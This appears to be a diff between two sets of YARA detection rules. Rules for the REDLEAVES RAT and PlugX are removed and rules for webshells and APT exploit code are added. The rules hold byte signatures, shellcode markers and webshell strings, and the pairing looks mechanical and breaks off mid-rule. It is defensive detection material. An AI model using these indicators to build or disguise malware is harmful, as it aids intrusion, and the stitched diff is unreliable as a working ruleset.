SIGNATURE_BASE_REDLEAVES_Droppedfile_Obfuscatedshellcodeandrat_Handkerchief +rule SIGNATURE_BASE_Hdconfig { meta: - description = "Detects obfuscated .dat file containing shellcode and core REDLEAVES RAT" - author = "USG" - id = "51a28529-1084-5f24-9369-6427e8d51d9d" - date = "2024-04-17" - modified = "2024-04-17" - reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_uscert_ta17-1117a.yar#L36-L47" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "f91bd1ddd6691a0a5b6ebc6a28d35bb5b2e6c00754f07e58ffb01e06ad590ae3" - score = 75 - quality = 83 + description = "Webshells Auto-generated - file HDConfig.exe" + author = "Florian Roth (Nextron Systems)" + id = "6f743137-e85a-5298-b51e-c8792e507d28" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8997-L9012" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "7d60e552fdca57642fd30462416347bd" + logic_hash = "9001f79db15548cf3ca931d0043d078db7d900ab26093afbf5cd44d0a85800f4" + score = 60 + quality = 55 tags = "" - true_positive = "fb0c714cd2ebdcc6f33817abe7813c36" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d} + $s0 = "An encryption key is derived from the password hash. " + $s3 = "A hash object has been created. " + $s4 = "Error during CryptCreateHash!" + $s5 = "A new key container has been created." + $s6 = "The password has been added to the hash. " condition: - any of them + all of them } -rule SIGNATURE_BASE_REDLEAVES_Coreimplant_Uniquestrings : FILE +rule SIGNATURE_BASE_FSO_S_Ajan_2 { meta: - description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state" - author = "USG" - id = "fd4d4804-f7d9-549d-8f63-5f409d6180f9" - date = "2018-12-20" - modified = "2024-04-17" - reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_uscert_ta17-1117a.yar#L49-L64" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "ce6ab0f4007f3ea3c31442cab702ad3579faa6835d5ee9b4c03516ce0499bf3e" + description = "Webshells Auto-generated - file ajan.asp" + author = "Florian Roth (Nextron Systems)" + id = "a66c34ed-0ae2-5e04-bfc4-c82583c5e066" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L9013-L9025" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "22194f8c44524f80254e1b5aec67b03e" + logic_hash = "0ac31ee735c94289932369dfba5b408cbf71cc23fd48ce3e09dc7ce640a0d733" score = 75 - quality = 81 - tags = "FILE" + quality = 85 + tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii - $unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii - $unique7 = "\\NamePipe_MoreWindows" wide ascii + $s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")" + $s3 = "/file.zip" condition: - not uint32(0)==0x66676572 and any of them + all of them } -rule SIGNATURE_BASE_PLUGX_Redleaves +rule SIGNATURE_BASE_Webshell_And_Exploit_CN_APT_HK : WEBSHELL { meta: - description = "Detects specific RedLeaves and PlugX binaries" - author = "US-CERT Code Analysis Team" - id = "ede8ad8f-31cf-5314-9777-bddd60e499f2" - date = "2017-03-04" - date = "2017-04-03" - modified = "2024-04-17" - reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_uscert_ta17-1117a.yar#L66-L93" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "0c52110eb18dcdb7a0d4b8c42f22368acdd1bce44a192abcd71a20bee2705475" - score = 75 + description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters" + author = "Florian Roth (Nextron Systems)" + id = "eb37a22b-4e8a-5986-bd47-4ef5b4986f47" + date = "2014-10-10" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L9027-L9042" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + logic_hash = "ec3f1e985585e1bf77a46e971a20cd127064a64467761a5a570548dd63ec57e2" + score = 50 quality = 85 - tags = "" - incident = "10118538" - MD5_1 = "598FF82EA4FB52717ACAFB227C83D474" - MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032" - MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630" - MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83" - MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D" + tags = "WEBSHELL" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 } - $s1 = "C:\\Users\\user\\Desktop\\my_OK_2014\\bit9\\runsna\\Release\\runsna.pdb" - $s2 = "d:\\work\\plug4.0(shellcode)" - $s3 = "\\shellcode\\shellcode\\XSetting.h" - $s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 } - $s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 } - $s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 } - $s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 } - $s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 } - $s9 = "RedLeavesCMDSimulatorMutex" + $a0 = "